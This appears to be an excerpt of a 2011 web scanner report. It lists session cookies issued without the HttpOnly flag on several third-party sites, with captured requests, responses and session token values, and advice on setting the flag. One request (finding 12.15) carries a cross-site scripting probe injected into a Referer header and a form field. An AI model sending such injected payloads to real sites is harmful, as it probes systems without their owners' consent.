http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991
https://www.scanalert.com/RatingVerify
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/
http://www.theworkbuzz.com/employment-trends/video-interviews/
http://www.threatfire.com/
http://www.trip.com/
http://www.trip.com/index.html
http://www.untraceableemail.net/boobitrap/eCheck.php
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.websitetoolbox.com/tool/view/mb/file
http://www.worldmastiffforum.com/
http://www.worldmastiffforum.com/file
http://www.youtube.com/user/sqlrtfm
http://xcdn.xgraph.net/15530/db/xg.gif
http://zone.msn.com/en-us/home

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

12.1. https://admin.testandtarget.omniture.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8DF6A9910E66EA873F576D8BD1CA8ED9; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.2. https://admin.testandtarget.omniture.com/a previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=884811827AAEAFE10DFDB991D900C1FC; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 404 Not Found
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 19:18:32 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Connection: close
Set-Cookie: JSESSIONID=884811827AAEAFE10DFDB991D900C1FC; Path=/; Secure
Content-Length: 3855

<html lang="en">
<head>
<title>Error</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="/skins/omniture/global-styles-css.jsp" rel="stylesheet"
...[SNIP]...

12.3. https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/errors/browser_unsupported.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9B2B1208866F28D1FE7062D3D5AC5241; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /errors/browser_unsupported.jsp HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 19:18:26 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Connection: close
Set-Cookie: JSESSIONID=9B2B1208866F28D1FE7062D3D5AC5241; Path=/; Secure
Content-Length: 1128

<html lang="en">
<head>
<title>Unsupported Browser</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="/scripts/styles.css" rel="stylesheet" type="text
...[SNIP]...

12.4. https://admin.testandtarget.omniture.com/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=9B11A74E9BD91864464B374D60E09FA2; Path=/; Secure
JSESSIONID=FB6FC08AF0FE7F16BEDDF50011804EA4; Path=/; Secure

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 19:18:31 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Connection: close
Set-Cookie: JSESSIONID=9B11A74E9BD91864464B374D60E09FA2; Path=/; Secure
Set-Cookie: JSESSIONID=FB6FC08AF0FE7F16BEDDF50011804EA4; Path=/; Secure
Content-Length: 21675

<html>
<head>
<title>ADOBE - Test&Target Login</title>
<link rel="stylesheet" type="text/css" href="/skins/omniture/static_header.css">
<link rel="stylesheet" type="text/css" hre
...[SNIP]...

12.5. https://admin.testandtarget.omniture.com/login_hal.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/login_hal.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.6. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/scripts/jquery/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CA7E9F2DE8552C1FD4949D1F876B3713; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=CA7E9F2DE8552C1FD4949D1F876B3713; Path=/; Secure
Content-Type: text/html
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 19:10:16 GMT
Server: Test & Target
Content-Length: 72174

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

12.7. https://admin.testandtarget.omniture.com/skins/omniture/login.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=83BF34C0FE16352BA07ED364F7AB5210; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.8. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/static_header.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=253037367E1BEBF8A6563C18CAC12F52; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skins/omniture/static_header.css HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 19:18:09 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Connection: close
Set-Cookie: JSESSIONID=253037367E1BEBF8A6563C18CAC12F52; Path=/; Secure
Content-Length: 8727

fieldset,img{border:0;}
address,caption,cite,code,dfn,em,strong,th,var{font-style:normal;font-weight:normal;}
ol,ul {list-style:none;}
caption,th {text-align:left;}
h1,h2,h3,h4,h5,h6{font-size:100%;f
...[SNIP]...

12.9. https://admin.testandtarget.omniture.com/user/forgot_password.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/user/forgot_password.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D73AC528F3F0D39AC704A6925A01FDBE; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgot_password.jsp HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 19:18:24 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Connection: close
Set-Cookie: JSESSIONID=D73AC528F3F0D39AC704A6925A01FDBE; Path=/; Secure
Content-Length: 3574

<html lang="en">
<head>
<title>Forgot Password</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="/skins/omniture/global-styles-css.jsp" rel="styl
...[SNIP]...

12.10. http://advertising.aol.com/privacy/advertisingcom/opt-out previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://advertising.aol.com
Path:	/privacy/advertisingcom/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSff329d810a46b3a1bf645141daed34cf=48b6ee52b08037054e01ddbd2a94b7c3; expires=Thu, 24 Feb 2011 19:03:28 GMT; path=/; domain=.advertising.aol.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=48b6ee52b08037054e01ddbd2a94b7c3; expires=Thu, 24 Feb 2011 19:03:28 GMT; path=/; domain=.advertising.aol.com
Last-Modified: Tue, 01 Feb 2011 13:00:41 GMT
ETag: "0a9fe2bb59c89e56d522cb6d0c18bd82"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 31687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

12.11. http://amihackerproof.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://amihackerproof.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=pb9a54rcdfapplliujtg1g42b4; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:17:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=pb9a54rcdfapplliujtg1g42b4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7235
Connection: close
Content-Type: text/html

<html>
<head>
<meta name="description" content="AmIHackerProof.com Is The most Powerful And Accurate Online Vulnerability & Penetration Scanner In The World." />
<meta name="keywords" content="
...[SNIP]...

12.12. http://blekko.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://blekko.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionid=352926924; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:21:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:21:42 GMT
Set-Cookie: v=1; path=/; expires=Sat, 30 Jan 2021 19:21:42 GMT
Set-Cookie: sessionid=352926924; path=/
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-PT: b97ddbe98091c39df49fb3186a1610ec
Content-Length: 11867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

12.13. http://blekko.com/ws/http:/2mdn.net/%20/domain previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://blekko.com
Path:	/ws/http:/2mdn.net/%20/domain

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionid=351987218; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ws/http:/2mdn.net/%20/domain HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.14. http://blogs.ittoolbox.com/pm/ppm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://blogs.ittoolbox.com
Path:	/pm/ppm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACCQACBQ=NCFKLBLDKFJMIKPJAPBHDJPK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pm/ppm HTTP/1.1
Host: blogs.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Feb 2011 14:26:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://it.toolbox.com/blogs/ppmtoday
Content-Length: 25
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCQACBQ=NCFKLBLDKFJMIKPJAPBHDJPK; path=/
Cache-control: private

12.15. http://boardreader.com/moduleindex.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://boardreader.com
Path:	/moduleindex.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; path=/; domain=.boardreader.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /moduleindex.php?frandom=0.9355478414800018 HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Origin: http://boardreader.com
Pragma: no-cache
Method: post /moduleindex.php?frandom=0.9355478414800018 HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Cache-Control: must-revalidate, no-cache, no-store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: human_user=true
Content-Length: 688

funcName=ajax_runModule&funcArgs[]=name%3Dpagehelper%26ip%3D%26request_uri%3D/boardreader.com/domain/2mdn.net/x22%3Febef7%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E6f696982a6d%3D1%26http_r
...[SNIP]...

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 20:08:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; path=/; domain=.boardreader.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 21

<phplivex></phplivex>

12.16. http://brothercake.com/site/resources/scripts/onload/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://brothercake.com
Path:	/site/resources/scripts/onload/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=a9cf46730e759a203326782ac170a524; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/resources/scripts/onload/ HTTP/1.1
Host: brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:36 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=a9cf46730e759a203326782ac170a524; path=/
Connection: close
Content-Type: text/html
Content-Length: 14479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<meta http
...[SNIP]...

12.17. http://bugs.jquery.com/ticket/7509 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bugs.jquery.com
Path:	/ticket/7509

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trac_form_token=ed1b6de568702a1c8f09b564; Path=/
trac_session=1baf223dbf08e097e51fe085; expires=Wed, 04-May-2011 07:28:31 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ticket/7509 HTTP/1.1
Host: bugs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Ok
Server: nginx/0.7.65
Date: Thu, 03 Feb 2011 07:28:31 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: must-revalidate
Content-Length: 30463
Set-Cookie: trac_form_token=ed1b6de568702a1c8f09b564; Path=/
Set-Cookie: trac_session=1baf223dbf08e097e51fe085; expires=Wed, 04-May-2011 07:28:31 GMT; Path=/

